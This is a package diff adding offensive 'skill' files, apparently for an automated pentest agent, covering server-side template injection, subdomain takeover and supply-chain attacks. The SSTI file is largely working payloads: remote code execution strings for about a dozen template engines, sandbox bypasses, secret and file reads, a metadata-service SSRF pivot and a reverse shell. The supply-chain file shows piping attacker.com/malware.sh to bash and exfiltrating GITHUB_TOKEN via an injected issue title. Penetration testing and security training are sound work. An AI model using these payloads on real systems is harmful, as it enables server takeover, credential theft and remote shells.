@aegis-scan/skills 0.4.0 → 0.5.1

package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md

@@ -0,0 +1,344 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: ssti
+description: Server-Side Template Injection detection and exploitation across all major template engines
+---
+
+# Server-Side Template Injection (SSTI)
+
+SSTI occurs when user input is embedded directly into a server-side template and evaluated. Unlike XSS, SSTI executes on the server, often leading to RCE. Treat every endpoint that reflects input in dynamic pages as a potential SSTI surface.
+
+## Attack Surface
+
+**Template Engines by Language**
+- Python: Jinja2, Mako, Chameleon, Tornado, Django templates
+- JavaScript/Node: Pug (Jade), Handlebars, EJS, Nunjucks, Mustache, Twig.js
+- PHP: Twig, Smarty, Blade (Laravel), Volt (Phalcon), Plates
+- Java: Freemarker, Velocity, Thymeleaf, Pebble, Groovy
+- Ruby: ERB, Slim, Haml, Liquid
+- .NET: Razor, DotLiquid, Scriban
+
+**Common Injection Points**
+- Email/notification templates with user-controlled subject or body
+- Report generators and PDF exports with custom fields
+- Marketing/CMS pages with user-supplied HTML/template snippets
+- Error pages that reflect URL path or query parameters
+- Configuration UIs with template previews
+- Chat/comment systems with Markdown + template hybrid rendering
+- REST API responses rendering custom messages
+
+## Detection — Engine Fingerprinting
+
+Use a polyglot probe first, then narrow by engine response:
+
+```
+# Polyglot probe — triggers all major engines
+${{<%[%'"}}%\.
+```
+
+| Payload | Expected Output | Engine |
+|---------|----------------|--------|
+| `{{7*7}}` | `49` | Jinja2, Twig, Nunjucks |
+| `${7*7}` | `49` | Freemarker, Velocity, Mako |
+| `<%= 7*7 %>` | `49` | ERB, EJS |
+| `#{7*7}` | `49` | Ruby ERB (alternative) |
+| `{{7*'7'}}` | `49` or `7777777` | Jinja2 (49) vs Twig (7777777) |
+| `{7*7}` | `49` | Smarty |
+| `@(7*7)` | `49` | Razor (.NET) |
+| `*{7*7}` | `49` | Thymeleaf (Spring) |
+
+**Distinguishing Jinja2 vs Twig:**
+```
+{{7*'7'}}
+# Jinja2 → 49 (numeric multiplication)
+# Twig   → 7777777 (string repetition)
+```
+
+**Blind SSTI (no output reflection):**
+```bash
+# Time-based via sleep
+{{config.__class__.__init__.__globals__['os'].popen('sleep 5').read()}}
+# Or via OOB DNS callback
+{{''.__class__.__mro__[2].__subclasses__()[40]('/dev/tcp/attacker.com/80')}}
+```
+
+## Engine-Specific Exploitation
+
+### Jinja2 (Python)
+
+**Read /etc/passwd:**
+```python
+{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
+# Or via config globals
+{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
+```
+
+**RCE via subprocess:**
+```python
+{{''.__class__.__mro__[2].__subclasses__()[258]('id',shell=True,stdout=-1).communicate()[0].strip()}}
+# Find correct index: iterate __subclasses__() to find subprocess.Popen
+{% for x in ''.__class__.__mro__[2].__subclasses__() %}
+  {% if 'subprocess' in x.__name__ %}{{x('id',shell=True,stdout=-1).communicate()}}{% endif %}
+{% endfor %}
+```
+
+**Bypass sandbox / attr filter:**
+```python
+# Using request object (Flask context)
+{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
+# Using cycler
+{{cycler.__init__.__globals__.os.popen('id').read()}}
+# Using joiner
+{{joiner.__init__.__globals__.os.popen('id').read()}}
+# Using lipsum
+{{lipsum.__globals__['os'].popen('id').read()}}
+```
+
+**Filter bypass (underscore/bracket blocked):**
+```python
+# Use |attr filter
+{{()|attr('__class__')|attr('__mro__')|...}}
+# Hex encoding
+{{()|attr('\x5f\x5fclass\x5f\x5f')}}
+# String concatenation
+{{'__cla'+'ss__'}}
+```
+
+### Twig (PHP)
+
+**RCE:**
+```php
+{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
+# Or via system
+{{['id']|filter('system')}}
+# Or passthru
+{{['id']|filter('passthru')}}
+# shell_exec
+{{"id"|shell_exec}}
+```
+
+**Read file:**
+```php
+{{"/etc/passwd"|file_get_contents}}
+```
+
+**PHP 8 / newer Twig bypass:**
+```php
+{% set cmd %}id{% endset %}
+{% set output = cmd|filter('system') %}
+```
+
+### Freemarker (Java)
+
+**RCE:**
+```
+<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
+# Or via ObjectConstructor
+<#assign classLoader=object?api.class.protectionDomain.classLoader>
+<#assign owc=classLoader.loadClass("freemarker.template.utility.ObjectConstructor")>
+<#assign dwf=owc?api.newInstance()>
+${dwf("java.lang.Runtime")?api.exec("id")}
+```
+
+**SSRF via Freemarker:**
+```
+<#assign is="java.io.InputStreamReader"?new("https://attacker.com")>
+${is.read()}
+```
+
+### Velocity (Java)
+
+**RCE:**
+```
+#set($runtime = $class.inspect("java.lang.Runtime").type)
+#set($process = $runtime.exec("id"))
+#set($output = $process.inputStream)
+```
+
+### Smarty (PHP)
+
+**RCE:**
+```php
+{php}echo `id`;{/php}
+# Newer Smarty (no PHP tags):
+{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
+```
+
+### ERB (Ruby)
+
+**RCE:**
+```ruby
+<%= `id` %>
+<%= IO.popen('id').read %>
+<%= system('id') %>
+```
+
+### Thymeleaf (Java/Spring)
+
+**Expression injection:**
+```
+__${T(java.lang.Runtime).getRuntime().exec("id")}__::.x
+# In URL context
+__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
+```
+
+**Spring SpEL via Thymeleaf:**
+```
+${T(java.lang.Runtime).getRuntime().exec('id')}
+```
+
+### Handlebars (Node.js)
+
+**Prototype pollution to RCE:**
+```javascript
+{{#with "s" as |string|}}
+  {{#with "e"}}
+    {{#with split as |conslist|}}
+      {{this.pop}}
+      {{this.push (lookup string.sub "constructor")}}
+      {{this.pop}}
+      {{#with string.split as |codelist|}}
+        {{this.pop}}
+        {{this.push "return require('child_process').execSync('id').toString();"}}
+        {{this.pop}}
+        {{#each conslist}}
+          {{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}
+        {{/each}}
+      {{/with}}
+    {{/with}}
+  {{/with}}
+{{/with}}
+```
+
+### Pug/Jade (Node.js)
+
+**RCE:**
+```javascript
+#{function(){localLoad=global.process.mainModule.constructor._resolveFilename('child_process');childProcess=require(localLoad);return childProcess.execSync('id').toString()}()}
+```
+
+### EJS (Node.js)
+
+**RCE:**
+```javascript
+<% global.process.mainModule.require('child_process').execSync('id') %>
+```
+
+## Escalation Paths
+
+**SSTI → File Read:**
+```python
+# Python: open() via subclasses
+{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
+# PHP Twig
+{{"/etc/passwd"|file_get_contents}}
+```
+
+**SSTI → Internal Network Scan (SSRF pivot):**
+```python
+# Python — hit internal endpoints
+{{config.__class__.__init__.__globals__['urllib'].request.urlopen('http://169.254.169.254/latest/meta-data/').read()}}
+```
+
+**SSTI → Environment Variables (secrets):**
+```python
+# Jinja2
+{{config}}
+{{config.items()}}
+# Shows SECRET_KEY, DB passwords etc.
+{{''.__class__.__mro__[2].__subclasses__()[40]('/proc/self/environ').read()}}
+```
+
+**SSTI → Reverse Shell:**
+```bash
+# After confirming RCE via id/whoami
+bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'
+# URL-encoded in template
+{{config.__class__.__init__.__globals__['os'].popen('bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"').read()}}
+```
+
+## Testing Methodology
+
+1. **Identify reflection** — find endpoints where input appears in response (especially emails, reports, custom fields)
+2. **Inject polyglot** — use `${{<%[%'"}}%\.` to provoke errors revealing engine
+3. **Confirm SSTI vs XSS** — SSTI evaluates math: `{{7*7}}` → `49`; XSS reflects literally
+4. **Fingerprint engine** — use `{{7*'7'}}` to distinguish Jinja2 (49) vs Twig (7777777)
+5. **Probe for RCE** — try engine-specific OS execution payloads
+6. **Find subclasses index** — iterate `__subclasses__()` to locate subprocess/os classes
+7. **Exfiltrate** — read config, env vars, /etc/passwd, then escalate to shell
+
+```bash
+# Quick fingerprint via curl
+curl -s "https://target.com/render?name={{7*7}}"
+# Returns 49 → SSTI confirmed, likely Jinja2/Twig
+
+# Identify engine
+curl -s "https://target.com/render?name={{7*'7'}}"
+# 49 → Jinja2, 7777777 → Twig
+
+# Confirm RCE (Jinja2)
+curl -s "https://target.com/render?name={{config.__class__.__init__.__globals__['os'].popen('id').read()}}"
+```
+
+## Bypass Techniques
+
+**Blocked `_` (underscore):**
+```python
+{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')}}
+# Or using |attr() chaining
+```
+
+**Blocked `.` (dot):**
+```python
+{{''['__class__']['__mro__'][2]['__subclasses__']()}}
+```
+
+**Blocked keywords (`config`, `class`, `import`):**
+```python
+# Split strings
+{{'__cla'+'ss__'}}
+# Hex/unicode
+{{'\x5f\x5fclass\x5f\x5f'}}
+```
+
+**Jinja2 sandbox escape:**
+```python
+# Via namespace object
+{% set x = namespace(y=().__class__.__mro__[1].__subclasses__()) %}
+```
+
+## Validation
+
+1. Execute `id` or `whoami` and show full output in response
+2. Read `/etc/passwd` and extract first line
+3. Make DNS callback to Burp Collaborator/interactsh proving blind execution
+4. Demonstrate environment variable exfiltration (`SECRET_KEY`, `DATABASE_URL`)
+5. Show full RCE reproduction curl command
+
+## False Positives
+
+- `{{7*7}}` reflected literally — template engine is escaping or not evaluating
+- Math output in rendering context that pre-processes client-side (Angular, Vue template syntax)
+- Calculator/math expression evaluators that happen to use curly braces
+
+## Impact
+
+- Full RCE on web server as application user
+- Secret/credential extraction (DB passwords, API keys, JWT secret keys)
+- Internal network pivoting via SSRF
+- Container escape if running in Docker without seccomp
+
+## Pro Tips
+
+1. Always iterate `__subclasses__()` to find correct class index — it changes between Python versions
+2. Try `{{config}}` in Flask/Jinja2 first — often dumps entire Flask config including SECRET_KEY
+3. In Java engines, `T(java.lang.Runtime)` is the universal RCE primitive
+4. For blind SSTI, use DNS callbacks via `curl` or `nslookup` in the executed command
+5. Twig blocks `_self` in newer versions — fall back to filter chains with `passthru`/`system`
+6. EJS and Pug run in Node.js: always try `require('child_process').execSync()`
+7. Check if the template engine is sandboxed — Jinja2 sandbox bypass via `cycler`/`lipsum` globals
+
+## Summary
+
+SSTI is critical because it executes on the server. Fingerprint the engine first (math probe), then use engine-specific RCE primitives. Always validate with real command execution output. Even "sandboxed" engines have known escapes.

package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md

@@ -0,0 +1,160 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: subdomain-takeover
+description: Subdomain takeover testing for dangling DNS records and unclaimed cloud resources
+---
+
+# Subdomain Takeover
+
+Subdomain takeover lets an attacker serve content from a trusted subdomain by claiming resources referenced by dangling DNS (CNAME/A/ALIAS/NS) or mis-bound provider configurations. Consequences include phishing on a trusted origin, cookie and CORS pivot, OAuth redirect abuse, and CDN cache poisoning.
+
+## Attack Surface
+
+- Dangling CNAME/A/ALIAS to third-party services (hosting, storage, serverless, CDN)
+- Orphaned NS delegations (child zones with abandoned/expired nameservers)
+- Decommissioned SaaS integrations (support, docs, marketing, forms) referenced via CNAME
+- CDN "alternate domain" mappings (CloudFront/Fastly/Azure CDN) lacking ownership verification
+- Storage and static hosting endpoints (S3/Blob/GCS buckets, GitHub/GitLab Pages)
+
+## Reconnaissance
+
+### Enumeration Pipeline
+
+- Subdomain inventory: combine CT (crt.sh APIs), passive DNS sources, in-house asset lists, IaC/terraform outputs
+- Resolver sweep: use IPv4/IPv6-aware resolvers; track NXDOMAIN vs SERVFAIL vs provider-branded 4xx/5xx
+- Record graph: build a CNAME graph and collapse chains to identify external endpoints
+
+### DNS Indicators
+
+- CNAME targets ending in provider domains: `github.io`, `amazonaws.com`, `cloudfront.net`, `azurewebsites.net`, `blob.core.windows.net`, `fastly.net`, `vercel.app`, `netlify.app`, `herokudns.com`, `trafficmanager.net`, `azureedge.net`, `akamaized.net`
+- Orphaned NS: subzone delegated to nameservers on a domain that has expired or no longer hosts authoritative servers
+- MX to third-party mail providers with decommissioned domains
+- TXT/verification artifacts (`asuid`, `_dnsauth`, `_github-pages-challenge`) suggesting previous external bindings
+
+### HTTP Fingerprints
+
+Service-specific unclaimed messages (examples):
+- **GitHub Pages**: "There isn't a GitHub Pages site here."
+- **Fastly**: "Fastly error: unknown domain"
+- **Heroku**: "No such app" or "There's nothing here, yet."
+- **S3 static site**: "NoSuchBucket" / "The specified bucket does not exist"
+- **CloudFront**: 403/400 with "The request could not be satisfied"
+- **Azure App Service**: default 404 for azurewebsites.net unless custom-domain verified
+- **Shopify**: "Sorry, this shop is currently unavailable"
+
+TLS clues: certificate CN/SAN referencing provider default host instead of the custom subdomain
+
+## Key Vulnerabilities
+
+### Claim Third-Party Resource
+
+- Create the resource with the exact required name:
+  - Storage/hosting: S3 bucket "sub.example.com" (website endpoint)
+  - Pages hosting: create repo/site and add the custom domain
+  - Serverless/app hosting: create app/site matching the target hostname
+
+### CDN Alternate Domains
+
+- Add the victim subdomain as an alternate domain on your CDN distribution if the provider does not enforce domain ownership checks
+- Upload a TLS cert or use managed cert issuance
+
+### NS Delegation Takeover
+
+- If a child zone is delegated to nameservers under an expired domain, register that domain and host authoritative NS
+- Publish records to control all hosts under the delegated subzone
+
+### Mail Surface
+
+- If MX points to a decommissioned provider, takeover could enable email receipt for that subdomain
+
+## Advanced Techniques
+
+### Blind and Cache Channels
+
+- CDN edge behavior: 404/421 vs 403 differentials reveal whether an alt name is partially configured
+- Cache poisoning: once taken over, exploit cache keys to persist malicious responses
+
+### CT and TLS
+
+- Use CT logs to detect unexpected certificate issuance for your subdomain
+- For PoC, issue a DV cert post-takeover (within scope) to produce verifiable evidence
+
+### OAuth and Trust Chains
+
+- If the subdomain is whitelisted as an OAuth redirect/callback or in CSP/script-src, takeover elevates to account takeover or script injection
+
+### Verification Gaps
+
+- Look for providers that accept domain binding prior to TXT verification
+- Race windows: re-claim resource names immediately after victim deletion
+
+### Wildcards and Fallbacks
+
+- Wildcard CNAMEs to providers may expose unbounded subdomains
+- Fallback origins: CDNs configured with multiple origins may expose unknown-domain responses
+
+## Special Contexts
+
+### Storage and Static
+
+- S3/GCS/Azure Blob static sites: bucket naming constraints dictate whether a bucket can match hostname
+- Website vs API endpoints differ in claimability and fingerprints
+
+### Serverless and Hosting
+
+- GitHub/GitLab Pages, Netlify, Vercel, Azure Static Web Apps: domain binding flows vary
+- Most require TXT now, but historical projects may not
+
+### CDN and Edge
+
+- CloudFront/Fastly/Azure CDN/Akamai: alternate domain verification differs
+- Some products historically allowed alt-domain claims without proof
+
+### DNS Delegations
+
+- Child-zone NS delegations outrank parent records
+- Control of delegated NS yields full control of all hosts below that label
+
+## Testing Methodology
+
+1. **Enumerate subdomains** - Aggregate CT logs, passive DNS, and org inventory
+2. **Resolve DNS** - All RR types: A/AAAA, CNAME, NS, MX, TXT; keep CNAME chains
+3. **HTTP/TLS probe** - Capture status, body, error text, Server headers, certificate SANs
+4. **Fingerprint providers** - Map known "unclaimed/missing resource" signatures
+5. **Attempt claim** (with authorization) - Create missing resource with exact required name
+6. **Validate control** - Serve minimal unique payload; confirm over HTTPS
+
+## Validation
+
+1. Before: record DNS chain, HTTP response (status/body length/fingerprint), and TLS details
+2. After claim: serve unique content and verify over HTTPS at the target subdomain
+3. Optional: issue a DV certificate (legal scope) and reference CT entry as evidence
+4. Demonstrate impact chains (CSP/script-src trust, OAuth redirect acceptance, cookie Domain scoping)
+
+## False Positives
+
+- "Unknown domain" pages that are not claimable due to enforced TXT/ownership checks
+- Provider-branded default pages for valid, owned resources (not a takeover)
+- Soft 404s from your own infrastructure or catch-all vhosts
+
+## Impact
+
+- Content injection under trusted subdomain: phishing, malware delivery, brand damage
+- Cookie and CORS pivot: if parent site sets Domain-scoped cookies or allows subdomain origins
+- OAuth/SSO abuse via whitelisted redirect URIs
+- Email delivery manipulation for subdomain
+
+## Pro Tips
+
+1. Build a pipeline: enumerate (subfinder/amass) → resolve (dnsx) → probe (httpx) → fingerprint (nuclei/custom) → verify claims
+2. Maintain a current fingerprint corpus; provider messages change frequently
+3. Prefer minimal PoCs: static "ownership proof" page and, where allowed, DV cert issuance
+4. Monitor CT for unexpected certs on your subdomains
+5. Eliminate dangling DNS in decommission workflows first
+6. For NS delegations, treat any expired nameserver domain as critical
+7. Use CAA to limit certificate issuance while you triage
+
+## Summary
+
+Subdomain safety is lifecycle safety: if DNS points at anything, you must own and verify the thing on every provider and product path. Remove or verify—there is no safe middle.

package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md

@@ -0,0 +1,125 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: supply-chain
+description: Exploitation techniques targeting CI/CD pipelines, package ecosystems, dependency confusion, and build infrastructure.
+---
+
+# Supply Chain Vulnerabilities
+
+Supply chain attacks target the software development lifecycle (SDLC), tools, and external dependencies used by an organization rather than attacking the production application directly. A successful supply chain attack can compromise thousands of downstream consumers simultaneously (e.g., SolarWinds, Codecov). 
+
+These vulnerabilities often manifest in CI/CD pipelines, source code repositories, and dependency management systems.
+
+## 1. Dependency Confusion & Typosquatting
+
+Organizations often use proprietary, internal packages alongside public open-source packages from registries like npm, PyPI, or RubyGems.
+
+### A. Dependency Confusion Attack
+If an organization's internal package manager (e.g., Jenkins, Artifactory) is misconfigured to check a public registry *before* the internal registry, or if it queries both and favors the higher version number, an attacker can hijack the build process.
+
+1.  **Reconnaissance:** Analyze public `package.json`, `requirements.txt`, or exposed build logs to identify the names of internal, scoped, or private packages (e.g., `@acme-corp/auth-lib`).
+2.  **Exploitation:** The attacker registers a package with the *exact same name* on the public registry (e.g., npmjs.com), giving it an artificially high version number (e.g., `99.99.99`).
+3.  **Execution:** When the victim's CI/CD pipeline runs `npm install`, the package manager pulls the malicious package from the public registry due to the high version number, executing arbitrary code (via `preinstall` or `postinstall` scripts) on the build server.
+
+### B. Typosquatting
+Similar to domain typosquatting, attackers register public packages with names closely resembling popular legitimate packages (e.g., registering `react-domm` instead of `react-dom` or `python-urllib3` instead of `urllib3`).
+- **Impact:** Developers accidentally typing the wrong name execute malicious pre-install hooks, resulting in workstation compromise or credential theft.
+
+---
+
+## 2. CI/CD Pipeline Exploitation (GitHub Actions, GitLab CI)
+
+CI/CD pipelines (Jenkins, GitHub Actions, GitLab CI) inherently hold highly privileged secrets (AWS access keys, SSH deployment keys, registry tokens) and have direct write access to production environments.
+
+### A. Malicious Pull Requests (PRs)
+Many open-source repositories run automated tests (linting, building, unit tests) when a Pull Request is submitted from a fork.
+
+1.  **The Attack:** An attacker forks a repository and submits a PR containing malicious code within test files, configuration files (e.g., `tox.ini`, `package.json` scripts), or the build scripts themselves.
+2.  **Execution:** If the CI/CD pipeline automatically executes untrusted code from PRs without requiring approval (e.g., GitHub Actions `pull_request_target` event instead of `pull_request`), the malicious code runs on the organization's build runner.
+3.  **Exfiltration:** The attacker's code dumps environment variables `env > out.txt` and exfiltrates the repository's secrets/tokens to an external server.
+
+### B. Poisoned Pipeline Execution (PPE)
+If a developer can push code to a branch, they can modify the `.github/workflows/deploy.yml` or `Jenkinsfile` itself.
+
+-   **Direct PPE:** An attacker with write access changes the build steps to `curl http://attacker.com/malware.sh | bash`. This compromises the build agent, allowing lateral movement into the network or theft of hardcoded deployment secrets.
+-   **Indirect PPE:** Modifying the pipeline configuration to alter the deployment destination or upload malicious artifacts instead of the genuine build output.
+
+### C. Runner Takeover (Self-Hosted Runners)
+Organizations often use self-hosted CI/CD runners (e.g., an AWS EC2 instance running the GitLab Runner agent) rather than shared cloud runners.
+-   If an attacker achieves RCE via a malicious PR on a persistent self-hosted runner, they can escape the container (if applicable) and compromise the host infrastructure, gaining access to the internal network and long-lived cloud credentials (IMDS).
+-   Cloud runners are ephemeral (destroyed after the job); self-hosted runners are often reused, meaning malware persists across build jobs.
+
+---
+
+## 3. GitHub Actions Specific Exploits
+
+### A. Command Injection / Context Injection
+Unsanitized user input flowing into GitHub workflow execution blocks.
+
+**Vulnerable Example:**
+```yaml
+steps:
+  - run: echo "Issue title: ${{ github.event.issue.title }}"
+```
+**Exploit:**
+An attacker creates a GitHub Issue titled: `Title"; curl -X POST -d "$GITHUB_TOKEN" http://attacker.com; echo "x`.
+When the workflow runs, the YAML evaluates to:
+`echo "Issue title: Title"; curl -X POST -d "$GITHUB_TOKEN" http://attacker.com; echo "x"`
+The attacker steals the dynamically generated `GITHUB_TOKEN`.
+
+**Mitigation:**
+Always use environment variables for untrusted input:
+```yaml
+env:
+  TITLE: ${{ github.event.issue.title }}
+steps:
+  - run: echo "Issue title: $TITLE"
+```
+
+### B. Third-Party Action Compromise
+Workflows often rely on actions maintained by random third parties (e.g., `uses: untrusted-dev/cool-action@v1`). If that action's repository is compromised or the maintainer goes rogue, any pipeline relying on `@v1` automatically pulls the malicious code during the next build.
+
+---
+
+## 4. Source Code and Artifact Compromise
+
+### A. Compromising Upstream Repositories
+Attackers target the core infrastructure of open-source projects or SaaS vendors.
+1.  Stealing maintainer credentials (weak passwords, missing 2FA).
+2.  Pushing malicious commits silently.
+3.  Downstream users pull the compromised updates naturally.
+
+### B. Artifact Tampering
+If the build process signs artifacts (e.g., Docker images, JAR files), but the signing key is loosely protected, or the verification steps downstream are flawed, an attacker can replace legitimate binaries on an artifact repository (like Nexus or Artifactory) with backdoored versions.
+
+---
+
+## 5. Secret Leaks & Hardcoded Credentials
+
+The most common "supply chain" vulnerability is simply developers leaving keys in the codebase.
+-   AWS Keys, Database passwords, or API Keys committed to `.git` history.
+-   Attackers use tools like `trufflehog` or `gitleaks` to scan public or leaked repositories. Once a key is found, the attacker uses it to pivot into the cloud infrastructure or production databases, bypassing the application layer entirely.
+
+## Tooling & Methodology
+
+```bash
+# Recon and Secret Scanning
+trufflehog git https://github.com/target/repo
+gitleaks detect --source . -v
+
+# Dependency Vulnerability Scanning
+npm audit
+retire.js
+safety check # for Python
+
+# CI/CD Security Posture
+Legitify # Checks GitHub/GitLab org/repo configurations for security issues
+```
+
+## Critical Pro Tips
+
+1.  **Look for the `pull_request_target` Trigger (GitHub):** This event runs the workflow in the context of the *base* repository, not the fork, giving it access to repository secrets. It is incredibly dangerous if it checks out untrusted code or passes untrusted data to a `run` block.
+2.  **Analyze `package-lock.json` and `yarn.lock`:** Don't just look at dependencies; look at where they are resolved from. Sometimes developers accidentally resolve packages to an insecure mirror (`http://...`) opening the door for MITM attacks during the build process.
+3.  **Assume the Runner is Root:** When exploiting a CI/CD runner, assume you have maximum privileges over that machine. Treat it like a standard internal penetration test. Run linPEAS, check Docker sockets (`/var/run/docker.sock`), and query cloud metadata APIs immediately.
+4.  **GitHub Token Enumeration:** If you extract the automatic `GITHUB_TOKEN` from a workflow, remember its permissions are determined by repository settings. It might only have read access, but it could have the power to create new releases, approve PRs, or modify repository settings.